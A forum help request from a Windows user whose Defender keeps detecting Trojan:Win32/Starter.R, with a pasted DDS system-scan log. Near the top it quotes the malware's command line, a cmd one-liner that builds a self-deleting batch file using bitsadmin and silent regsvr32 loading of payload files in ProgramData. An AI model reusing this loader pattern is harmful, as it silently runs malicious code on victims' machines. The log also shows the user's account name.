Defender finds the threat Trojan:Win32/Starter.R about 3-4x a day. Each time I remove it, but awhile later it hits on it again. I've also ran Malwarebytes and removed it with it several times, but still apparently shows back up. I've seen online when I was searching for info on it, several sites saying it can be easy to permanently remove BUT by using their program. I don't trust just every program that boasts being a legit virus remover. Needless to say I figured I'd come here (cause I know to trust any program you may recommend, if needed).
Thank you for your time and assistance.
P.S. I don't think I have easy access to windows boot cd
THIS IS WHAT "DETAILS" DEFENDER GIVES EACH TIME IT NOTIFIES ME OF IT
Trojan:Win32/Starter.R
CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /complete 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /cancel 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo if exist "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" goto q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\89331b0d-24f7-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\%i" >> "C:\ProgramData\89331b0d-24f7-1\x.bat")) > nul & echo :q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo del "C:\ProgramData\89331b0d-24f7-1\x.bat" ^& exit >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & "C:\ProgramData\89331b0d-24f7-1\x.bat""
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.17134.1
Run by Christopher&Gabriell at 20:04:03 on 2018-10-09
Microsoft Windows 10 Home 10.0.17134.0.1252.1.1033.18.3554.1271 [GMT -5:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\svchost.exe -k RPCSS -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs -p
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\system32\atiesrxx.exe
C:\WINDOWS\system32\atieclxx.exe
C:\WINDOWS\system32\svchost.exe -k LocalService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Program Files\IDT\WDM\STacSV64.exe
C:\WINDOWS\system32\svchost.exe -k appmodel -p
C:\WINDOWS\System32\svchost.exe -k NetworkService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\Hpservice.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\WINDOWS\system32\svchost.exe -k apphost
C:\WINDOWS\System32\svchost.exe -k utcsvc -p
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Core Temp\Core Temp.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
C:\Windows\System32\CastSrv.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Program Files\Windows Defender\MSASCuiL.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
C:\WINDOWS\system32\osk.exe
C:\Program Files\WindowsApps\Microsoft.WindowsStore_11809.1001.8.0_x64__8wekyb3d8bbwe\WinStore.App.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18081.14710.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera_crashreporter.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
C:\WINDOWS\SysWOW64\DllHost.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
C:\WINDOWS\system32\browser_broker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\Windows.WARP.JITService.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
svchost.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uLocal Page = %11%\blank.htm
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
uRun: [WinPatrol] C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe
mRun: [HP CoolSense] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe -byrunkey
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: EnableFullTrustStartupTasks = dword:2
mPolicies-System: EnableUwpStartupTasks = dword:2
mPolicies-System: SupportFullTrustStartupTasks = dword:1
mPolicies-System: SupportUwpStartupTasks = dword:1
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~1\Office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~1\MICROS~1\Office16\ONBttnIE.dll/105
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://www.pcpitstop.com/nirvana/controls/pcmatic.cab
TCP: Interfaces\{982D5C35-5D95-44B3-84D9-0D16030AAD83} : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-Run: [SecurityHealth] C:\Program Files (x86)\Windows Defender\MSASCuiL.exe
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: EnableFullTrustStartupTasks = dword:2
x64-mPolicies-System: EnableUwpStartupTasks = dword:2
x64-mPolicies-System: SupportFullTrustStartupTasks = dword:1
x64-mPolicies-System: SupportUwpStartupTasks = dword:1
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office16\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office16\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
x64-Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\68.0.3440.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2018-4-11 177192]
R0 iorate;Disk I/O Rate Filter Driver;C:\WINDOWS\System32\drivers\iorate.sys [2018-4-11 58272]
R0 SgrmAgent;System Guard Runtime Monitor Agent;C:\WINDOWS\System32\drivers\SgrmAgent.sys [2018-4-11 63896]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2018-4-11 16288]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2018-8-17 72768]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2018-4-11 18472]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2018-4-11 209816]
R1 afunix;afunix;C:\WINDOWS\System32\drivers\afunix.sys [2018-4-11 39424]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2018-4-11 254464]
R1 bam;Background Activity Moderator Driver;C:\WINDOWS\System32\drivers\bam.sys [2018-4-11 60320]
R1 CLVirtualDrive;CLVirtualDrive;C:\WINDOWS\System32\drivers\CLVirtualDrive.sys [2018-8-16 92536]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2018-4-11 55808]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2018-4-11 8192]
R2 AMD External Events Utility;AMD External Events Utility;C:\WINDOWS\System32\atiesrxx.exe [2014-9-15 257032]
R2 AMD FUEL Service;AMD FUEL Service;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2014-9-15 344064]
R2 AODDriver4.3;AODDriver4.3;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
R2 APXACC;AppEx Networks Accelerator LWF;C:\WINDOWS\System32\drivers\appexDrv.sys [2018-9-20 228032]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R2 CldFlt;Windows Cloud Files Filter Driver;C:\WINDOWS\System32\drivers\cldflt.sys [2018-8-17 414720]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork -p [2018-4-11 51288]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc -p [2018-4-11 51288]
R2 DusmSvc;Data Usage;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R2 hpsrv;HP Service;C:\WINDOWS\System32\hpservice.exe [2012-9-24 31040]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-11-21 333688]
R2 HPWMISVC;HPWMISVC;C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [2012-9-7 35232]
R2 IconMan_R;IconMan_R;C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2018-9-21 2451456]
R2 SecurityHealthService;Windows Defender Security Center Service;C:\WINDOWS\System32\SecurityHealthService.exe [2018-8-17 760888]
R2 SgrmBroker;System Guard Runtime Monitor Broker;C:\WINDOWS\System32\SgrmBroker.exe [2018-4-11 163336]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2018-4-11 82432]
R2 SynTPEnhService;SynTPEnh Caller Service;C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2016-4-28 253960]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2018-4-11 151960]
R3 ALSysIO;ALSysIO;C:\Users\CHRIST~1\AppData\Local\Temp\ALSysIO64.sys [2018-8-20 46384]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\WINDOWS\System32\drivers\AtihdWT6.sys [2017-11-17 111112]
R3 CAD;Charge Arbitration Driver;C:\WINDOWS\System32\drivers\CAD.sys [2018-4-11 60320]
R3 camsvc;Capability Access Manager Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2018-4-11 20992]
R3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 RSP2STOR;Realtek PCIE CardReader Driver - P2;C:\WINDOWS\System32\drivers\RtsP2Stor.sys [2018-8-16 310528]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2018-4-11 604160]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 TokenBroker;Web Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 usbfilter;AMD USB Filter Driver;C:\WINDOWS\System32\drivers\usbfilter.sys [2018-8-16 58536]
R3 WarpJITSvc;WarpJITSvc;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
R3 WdNisDrv;Windows Defender Antivirus Network Inspection System Driver;C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [2018-9-25 60584]
R3 WirelessButtonDriver64;HP Wireless Button Driver Service;C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [2018-5-11 34944]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2018-4-11 20480]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2018-4-11 1135520]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 amd_sata;amd_sata;C:\WINDOWS\System32\drivers\amd_sata.sys [2012-9-2 79528]
S3 amd_xata;amd_xata;C:\WINDOWS\System32\drivers\amd_xata.sys [2012-9-2 26280]
S3 amdkmafd;AMD Audio Bus Lower Filter;C:\WINDOWS\System32\drivers\amdkmafd.sys [2012-9-22 21160]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2018-4-11 18432]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness -p [2018-4-11 51288]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2018-4-11 9728]
S3 bindflt;Windows Bind Filter Driver;C:\WINDOWS\System32\drivers\bindflt.sys [2018-4-11 92056]
S3 BTAGService;Bluetooth Audio Gateway Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
S3 BthAvctpSvc;AVCTP service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 bttflt;Microsoft Hyper-V VHDPMEM BTT Filter;C:\WINDOWS\System32\drivers\bttflt.sys [2018-4-11 38304]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2018-4-11 39936]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2018-4-11 123392]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2018-4-11 321432]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2018-4-11 1836952]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2018-8-17 90624]
S3 diagsvc;Diagnostic Execution Service;C:\WINDOWS\System32\svchost.exe -k diagnostics [2018-4-11 51288]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2018-4-11 51288]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2018-4-11 20992]
S3 GraphicsPerfSvc;GraphicsPerfSvc;C:\WINDOWS\System32\svchost.exe -k GraphicsPerfSvcGroup [2018-4-11 51288]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2018-4-11 50592]
S3 hpqcaslwmiex;HP CASL Framework Service;C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [2016-6-4 1031704]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver;C:\WINDOWS\System32\drivers\mshwnclx.sys [2018-4-11 27136]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2018-4-11 36864]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2018-4-11 91648]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2018-4-11 79360]
S3 iaLPSS2i_GPIO2_BXT_P;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys [2018-4-11 88576]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2018-4-11 171520]
S3 iaLPSS2i_I2C_BXT_P;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys [2018-4-11 174592]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2018-4-11 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2018-4-11 113152]
S3 iaStorA;iaStorA;C:\WINDOWS\System32\drivers\iaStorA.sys [2012-9-28 650808]
S3 iaStorAVC;Intel Chipset SATA RAID Controller;C:\WINDOWS\System32\drivers\iaStorAVC.sys [2018-4-11 885144]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2018-4-11 526232]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2018-4-11 38912]
S3 InstallService;Microsoft Store Install Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 IPT;IPT;C:\WINDOWS\System32\drivers\ipt.sys [2018-4-11 32256]
S3 IpxlatCfgSvc;IP Translation Configuration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 ItSas35i;ItSas35i;C:\WINDOWS\System32\drivers\ItSas35i.sys [2018-4-11 145816]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2018-4-11 124312]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2018-4-11 128408]
S3 LxpSvc;Language Experience Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2018-4-11 51288]
S3 mausbhost;MA-USB Host Controller Driver;C:\WINDOWS\System32\drivers\mausbhost.sys [2018-4-11 505240]
S3 mausbip;MA-USB IP Filter Driver;C:\WINDOWS\System32\drivers\mausbip.sys [2018-4-11 56736]
S3 MBAMService;Malwarebytes Service;C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [2018-8-29 6541008]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2018-4-11 75160]
S3 megasas35i;megasas35i;C:\WINDOWS\System32\drivers\megasas35i.sys [2018-4-11 82328]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2018-4-11 842648]
S3 NaturalAuthentication;Natural Authentication;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2018-4-11 108952]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2018-4-11 175104]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2018-4-11 197632]
S3 nvdimm;Microsoft NVDIMM device driver;C:\WINDOWS\System32\drivers\nvdimm.sys [2018-4-11 104448]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE [2018-6-13 253640]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2018-4-11 58776]
S3 percsas3i;percsas3i;C:\WINDOWS\System32\drivers\percsas3i.sys [2018-4-11 61848]
S3 PhoneSvc;Phone Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 PNPMEM;Microsoft Memory Module Driver;C:\WINDOWS\System32\drivers\pnpmem.sys [2018-4-11 16896]
S3 PushToInstall;Windows PushToInstall Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
